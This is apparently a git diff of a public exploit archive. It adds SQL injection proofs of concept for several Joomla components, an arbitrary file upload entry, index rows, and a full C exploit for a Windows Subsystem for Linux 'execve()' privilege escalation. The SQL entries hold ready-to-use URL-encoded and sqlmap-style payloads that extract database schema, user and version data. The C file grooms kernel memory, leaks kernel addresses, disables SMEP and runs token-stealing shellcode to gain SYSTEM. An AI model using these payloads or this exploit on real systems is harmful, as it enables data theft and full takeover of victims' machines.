+# http://localhost/[PATH]/event.php?id=[SQL]
+# 
+# 2)
+# http://localhost/[PATH]/page.php?slug=[SQL]
+# 	
+# # # # #
--- a/exploits/php/webapps/43950.txt
+++ b/exploits/php/webapps/43950.txt
@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/jextn-reverse-auction/
+# Version: 3.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jereverseauction&view=products&layout=default_message&tmpl=component&id=[SQL]&uid=1
+# 
+# %2d%31%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%30%78%33%33%2c%30%78%33%34%2c%30%78%33%35%2c%28%53%65%6c%65%63%74%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2d%2d%20%2d
+#  
+# # # # #
--- a/exploits/php/webapps/43957.txt
+++ b/exploits/php/webapps/43957.txt
@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/jextn-classified/
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jeclassifieds&view=boutique&sid=[SQL]
+# 
+# %2d%32%38%30%30%27%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%28%31%29%2c%28%32%29%2c%28%53%65%6c%65%63%74%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%2c%28%31%36%29%2c%28%31%37%29%2c%28%31%38%29%2c%28%31%39%29%2c%28%32%30%29%2c%28%32%31%29%2c%28%32%32%29%2c%28%32%33%29%2c%28%32%34%29%2c%28%32%35%29%2c%28%32%36%29%29%2d%2d%20%2d
+#  
+# # # # #
--- a/exploits/php/webapps/43958.txt
+++ b/exploits/php/webapps/43958.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://janguo.de/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtawl/
+# Software Download: http://janguo.de/lang-en/joomla-25-higher/jimtawl/pkg_jimtawl-2-2-5-current-r561-zip.raw
+# Version: 2.2.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker upload arbitrary file....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component
+# 
+# http://localhost/[PATH]/media/efe_1517496506.php
+# 
+# # # # #
--- a/exploits/php/webapps/43959.txt
+++ b/exploits/php/webapps/43959.txt
@ -0,0 +1,71 @@
+# # # # #
+# Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: https://www.joommasters.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL]
+# 
+# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
+#  
+# Parameter: keyword (GET)
+#     Type: boolean-based blind
+#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+#     Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737#
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 OR time-based blind
+#     Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&artist=[SQL]
+# 
+# %27%20%20%2f%2a%21%30%32%32%32%32%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%32%32%32%32%53%45%4c%45%43%54%2a%2f%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d
+# 
+# Parameter: artist (GET)
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'ziQV' FROM DUAL WHERE 5411=5411 AND (SELECT 5581 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(5581=5581,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'xwge' FROM DUAL WHERE 8319=8319 AND SLEEP(5))||'
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&username=[SQL]
+# 
+# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
+# 
+# Parameter: username (GET)
+#     Type: boolean-based blind
+#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+#     Payload: option=com_jmsmusic&view=search&username=-1653' OR 6007=6007#
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jmsmusic&view=search&username=Efe' AND (SELECT 8019 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(8019=8019,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rMej
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 OR time-based blind
+#     Payload: option=com_jmsmusic&view=search&username=Efe' OR SLEEP(5)-- rhvR
+# 
+# # # # #
--- a/exploits/windows/local/43962.c
+++ b/exploits/windows/local/43962.c
@ -0,0 +1,450 @@
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <sys/ipc.h> 
+#include <sys/sem.h>
+#include <sys/shm.h>
+
+#define RING_SIZE				0x2000000
+#define PIPE_SIZE				0xb8
+#define PTR_SIZE				0x8
+#define STR_HDR_SIZE			0x18
+
+#define LEAK_OFFSET				0x68
+#define SHELLCODE_OFFSET		0x200
+#define CHUNK_LVXF_OFFSET		0x138f4296
+#define CR4_VAL_ADDR			0x506f8
+#define MAGIC_KEY				0xefef
+#define NT_OFFSET_TO_PIVOT		0x288005
+
+size_t curr_key 				= 0;
+
+char SHELLCODE[] = {
+	//0xcc,
+	0x90, 															// CLI
+	0x90, 															// PUSHFQ
+	0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RAX, Original Pointer
+	0x50, 															// PUSH RAX
+	0x51, 															// PUSH RCX
+	0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RCX, [OverwriteAddr+OverwriteOffset]
+	0x90, 0x90, 0x90,  												// MOV    QWORD PTR [RCX], RAX
+	0xb9, 0xfc, 0x11, 0x00, 0x00,  									// MOV ECX, PID
+
+	0x53, 															// PUSH RBX
+
+	0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,  			// MOV    RAX,QWORD PTR gs:0x188
+	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,						// MOV    RAX,QWORD PTR [RAX+0xb8] EPROCESS
+	0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00,						// LEA    RAX,[RAX+0xActiveProcessLinkOffset] 
+
+	//<tag>
+	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
+	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
+	0x48, 0x83, 0xfb, 0x04,											// CMP    RBX,0x4
+	0x75, 0xf3,														// JNE    <tag>
+	0x48, 0x8b, 0x58, 0x70,											// MOV    RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM
+	0x90, 0x90, 0x90,
+	0x53, 															// PUSH RBX
+	//<tag2>
+	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
+	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
+	0x39, 0xcb,														// CMP    EBX, ECX // our PID
+	0x75, 0xf5,														// JNE    <tag2>
+	0x5b, 															// POP RBX
+	0x48, 0x89, 0x58, 0x70,											// MOV    QWORD PTR[RAX +0x70], RBX
+	0x90, 0x90, 0x90,
+
+	0x5b, 															// POP RBX
+	0x59, 															// POP RCX
+	0x58, 															// POP RAX
+	0x90, 															// POPFQ
+
+	0xc3  															// RET
+};
+
+int calc_stop_idx(size_t alloc_size, size_t factor);
+int get_size_factor(size_t spray_size, size_t *factor);
+int trigger_corruption(int spray_size);
+int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx);
+int spray(size_t count);
+int alloc_sem(size_t factor);
+int free_sem(int key);
+char *get_faked_shm();
+void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid);
+void trigger_shm(size_t shmid);
+void print_shm(struct shmid_ds *buf);
+void *absolute_read(void* obj, size_t shmid, void *addr);
+int alloc_shm(size_t key);
+int shape(size_t *spray_size);
+
+int calc_stop_idx(size_t alloc_size, size_t factor) {
+	size_t totalStringsLength, headersLength;
+
+	totalStringsLength = (factor - 1) * 2 + 0xd001;
+	headersLength = (factor * STR_HDR_SIZE) % (0x100000000);
+
+	return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE;
+}
+
+int get_size_factor(size_t spray_size, size_t *factor) {
+	if (spray_size != 0x2000000) {
+		printf("SPRAY_SIZE ISSUE\n");
+		exit(1);
+	}
+
+	*factor = 0xab13aff - 0x800*2;
+	return 0x15fffdfc;
+}
+
+int trigger_corruption(int spray_size) {
+	size_t factor = 0, alloc_size, stopIdx;
+	int ret;
+	alloc_size = get_size_factor(spray_size, &factor);
+	if (alloc_size < 0) {
+		printf("[*err*] unsupported spray_size == 0x%x", spray_size);
+		return -1;
+	}
+
+	stopIdx = calc_stop_idx(alloc_size, factor);
+
+	ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
+	printf("[*] trigger_corruption() returned 0x%x\n", ret);
+	return 0;
+}
+
+int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx) {
+	char **argv, *innerBuf, *stopInnerBuf = NULL;
+	size_t pid;
+
+	argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, 
+                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+	if(!argv) {
+		perror("[*err*] malloc argv failed\n"); 
+		return -1;
+	}
+
+	innerBuf = (char*)malloc(innerSize); 
+	if (!innerBuf) {
+		printf("[*err*] malloc innerBuf failed\n");
+		return -1;
+	}
+	memset(innerBuf, pattern, innerSize);
+
+	for(size_t i = 0; i < argc - 1; ++i) {
+		argv[i] = innerBuf;
+	}
+	argv[argc-1] = NULL;
+
+	pid = fork();
+	if (pid) {
+		// parent
+		if(stopIdx > 0) {
+			sleep(1.5);
+			printf("[*] set stopIdx, stopping wildcopy\n");
+			argv[stopIdx] = NULL;
+		}
+		return 0;
+	} else {
+		// son
+		argv[stopIdx - 1] = (char*)malloc(0xe000);
+		memset(argv[stopIdx - 1], "X", 0xd000-1);
+		argv[stopIdx - 1][0xd000-1] = '\0';
+
+		argv[stopIdx - 7] = (char*)malloc(0xe000);
+		memset(argv[stopIdx - 7], "X", 0xd000-1);
+		argv[stopIdx - 7][0xd000-1] = '\0';
+
+		// this execve is on nonsense "program", so it will return err.
+		// Just kill the thread.
+		execve(argv[0], argv, NULL);
+		exit(1);
+	}
+}
+
+/*
+	spray <count> chunks, and return number of total bytes allocated
+*/
+int spray(size_t count) {
+	int exec[2];
+	int pipe_capacity = 0, ret = 0;
+
+	for (size_t i = 0; i < count; ++i) {
+		if (pipe(exec) < 0) {
+			printf("[*err*] pipe\n");
+			ret = -1;
+			goto cleanup;
+		}		
+
+		pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE);
+		if(pipe_capacity < 0) {
+			printf("[*err*] fcntl return neg capacity\n");
+			ret = -1;
+			goto cleanup;
+		}
+
+		ret += pipe_capacity;
+	}
+
+cleanup:
+	return ret;
+}
+
+/*
+	allocate 12 * v_nsems + 176
+*/
+int alloc_sem(size_t factor) {
+	int semid;
+  	int nsems = factor;
+
+  	semid = semget(curr_key++, nsems, IPC_CREAT | 0666);
+  	if(semid == -1) {
+  		printf("[*err*]semget failed, errno == 0x%x\n", errno);
+  		return -1;
+  	}
+
+	return semid;
+}
+
+int free_sem(int key) {
+	if(semctl(key, 0, IPC_RMID, 0) == -1) {
+		printf("[*err*] semctl failed, errno == 0x%x\n", errno);
+		return -1;
+    }
+    return 0;
+}
+
+char *get_faked_shm() {
+	size_t shellcode_length = 0;
+	char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
+					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
+	char *shellcode_ptr;
+
+	if (obj == (void*)-1) {
+		printf("[*err*] mmap failed\n");
+		return NULL;
+	}
+	char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
+					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
+	if (cr4_addr == (void*)-1) {
+		printf("[*err*] mmap failed\n");
+		return NULL;
+	}
+	memset(cr4_addr, 0x0, 0x10000);
+
+	printf("[*] mmap userspace addr %p, set faked shm object\n", obj);
+
+	obj += 0x1000;
+	shellcode_ptr = obj + 0x200;
+	initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1);
+	return obj;
+}
+
+void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid) {
+	size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR;
+	char *obj2 = obj+0x1000;
+
+	memset(obj - 0x100, 0x0, 0x1000);
+
+	memcpy(obj, &read_addr, sizeof(size_t));
+	memcpy((obj+0x10), &val, sizeof(size_t));
+
+	memcpy(obj - 0x20, &val2, sizeof(size_t));
+	memcpy(obj - 0x68, &obj, sizeof(char*));
+	memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*));
+	memcpy(obj - 0x80, &obj, sizeof(char*));
+	memcpy((obj + 0x40), &val, sizeof(size_t));
+
+	memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t));
+	memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t));
+	memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*));
+	memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*));
+	memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*));
+	memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t));
+
+	memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t));						// refcount
+	memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t));
+	memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t));
+
+	memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE));
+	memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4);
+}
+
+void trigger_shm(size_t shmid) {
+	char *data;
+	data = shmat(shmid, (void*)0, 0);
+}
+
+void print_shm(struct shmid_ds *buf) {
+	printf ("\nThe USER ID = %p\n", buf->shm_perm.uid);
+	printf ("The GROUP ID = %p\n", buf->shm_perm.gid);
+	printf ("The creator's ID = %p\n", buf->shm_perm.cuid);
+	printf ("The creator's group ID = %p\n", buf->shm_perm.cgid);
+	printf ("The operation permissions = 0%o\n", buf->shm_perm.mode);
+	printf ("The slot usage sequence\n");
+	//printf ("number = 0%x\n", buf->shm_perm.seq);
+	//printf ("The key= 0%x\n", buf->shm_perm.key);
+	printf ("The segment size = %p\n", buf->shm_segsz);
+	printf ("The pid of last shmop = %p\n", buf->shm_lpid);
+	printf ("The pid of creator = %p\n", buf->shm_cpid);
+	printf ("The current # attached = %p\n", buf->shm_nattch);
+	printf("The last shmat time = %p\n", buf->shm_atime);
+	printf("The last shmdt time = %p\n", buf->shm_dtime);
+	printf("The last change time = %p\n", buf->shm_ctime);
+}
+
+void *absolute_read(void* obj, size_t shmid, void *addr) {
+	struct shmid_ds shm;
+	initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1);
+	shmctl(shmid, IPC_STAT, &shm);
+	return (void*)shm.shm_ctime;
+}
+
+int alloc_shm(size_t key) {
+	int shmid;
+	shmid = shmget(key, 1024, 0644 | IPC_CREAT);
+	return shmid;
+}
+
+int shape(size_t *spray_size) {
+	size_t keys[0x400];
+	int exec[2];
+	int sv[2];
+    char flag;
+
+	size_t bytes = 0, tofree = 0;
+	size_t factor,hole_size;
+	struct flock fl;
+	memset(&fl, 0, sizeof(fl));
+	pid_t pid, wpid;
+	int status;
+
+	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
+		printf("[*err] socketpair failed\n");
+		return 1;
+	}
+
+	bytes = spray(1);
+	if (bytes == (size_t)-1) {
+		printf("[*err*] bytes < 0, are you root?\n");
+		return 1;
+	}
+
+	*spray_size = bytes;
+	hole_size = get_size_factor(*spray_size, &factor);
+
+	tofree = hole_size / (bytes / 1) + 1;
+
+	printf("[*] allocate holes before the workspace\n");
+	for (int i = 0; i < 0x400; ++i) {
+		keys[i] = alloc_sem(0x7000);
+	}
+	for (int i = 0; i < 0x20; ++i) {
+		alloc_sem(0x7000);
+	}
+	for (int i = 0; i < 0x2000; ++i) {
+		alloc_sem(4063);
+	}
+	for (int i = 0; i < 0x2000; ++i) {
+		alloc_sem(3);
+	}
+
+	pid = fork();
+	if (pid > 0) {
+		printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
+		bytes = spray(5);
+		write(sv[1], "p", 1);
+		read(sv[1], &flag, 1);
+	} else {
+		// son
+		read(sv[0], &flag, 1);
+		printf("[*] alloc workspace pages\n");
+		bytes = spray(tofree);
+		printf("[*] finish allocate workspace allocations\n");
+		write(sv[0], "p", 1);
+	}
+
+	if (pid > 0) {
+		printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
+		for (int i = 0; i < 0x100; ++i) {
+			alloc_sem(4061);
+			for (int j = 0; j < 0x5; ++j) {	
+				alloc_shm(i * 0x100 + j);
+			}
+		}
+		write(sv[1], "p", 1);
+	} else {
+		read(sv[0], &flag, 1);
+		printf("[*] free middle allocation, creating workspace freed\n");
+		exit(1);
+	}
+
+	while ((wpid = wait(&status)) > 0); 
+
+	printf("[*] free prepared holes, create little pages holes before the workspace\n");
+	for (int i = 0; i < 0x400; ++i) {
+		free_sem(keys[i]);
+	}
+	
+	return 0;
+}
+
+int main(int argc, char **argv) {
+	size_t spray_size = 0;
+	char *obj;
+	void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler;
+	void *nt_addr;
+
+	obj = get_faked_shm();
+
+	printf("[*] start shaping\n");
+	if (shape(&spray_size)) {
+		printf("[*err*] shape failed, exit\n");
+		return 1;
+	}
+
+	// if there is some shm with shmid==0, delete it
+	shmctl(0, IPC_RMID, NULL);
+
+	printf("[*] shape is done\n");
+	if (trigger_corruption(spray_size) < 0) {
+		printf("[*err*] internal error\n");
+		return 1;
+	}
+
+	sleep(8);
+
+	printf("[*] leak shm, with the corrupted shmid\n");
+	paged_pool_addr = absolute_read(obj, 1, NULL);
+
+	printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr);
+	file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET);
+	printf("[*] infoleak - fileObj addr at %p\n", file_obj);
+	lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET);
+	printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr);
+	nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET);
+	printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler);
+
+	printf("[*] call nt pivot, disable SMEP\n");
+	initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1);
+	trigger_shm(MAGIC_KEY);
+
+	sleep(5);
+
+	printf("[*] jump to shellcode!\n");
+	initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1]));
+	trigger_shm(MAGIC_KEY);
+
+	sleep(2);
+
+	return 0;
+}
--- a/exploits/windows/webapps/43883.txt
+++ b/exploits/windows/webapps/43883.txt
@ -84,7 +84,7 @@ Upgrade to BMC Track-It! 11.5 or above.
 >> References:
 [1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt
 [2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available
-[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)
+[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)


 ================
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9307,6 +9307,7 @@ id,file,description,date,author,type,platform,port
 43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos,
 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,
+43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -37956,6 +37957,19 @@ id,file,description,date,author,type,platform,port
 43932,exploits/php/webapps/43932.txt,"Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
 43933,exploits/php/webapps/43933.txt,"Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php,
 43934,exploits/windows/webapps/43934.py,"BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure",2018-01-30,"Paul Taylor",webapps,windows,4750
+43940,exploits/php/webapps/43940.html,"Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43949,exploits/php/webapps/43949.txt,"Event Manager 1.0 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43941,exploits/php/webapps/43941.txt,"Fancy Clone Script - 'search_browse_product' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43942,exploits/php/webapps/43942.txt,"Real Estate Custom Script - 'route' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43943,exploits/php/webapps/43943.txt,"Advance Loan Management System - 'id' SQL Injection",2018-02-02,8bitsec,webapps,php,
+43947,exploits/aspx/webapps/43947.txt,"IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting",2018-02-02,1n3,webapps,aspx,
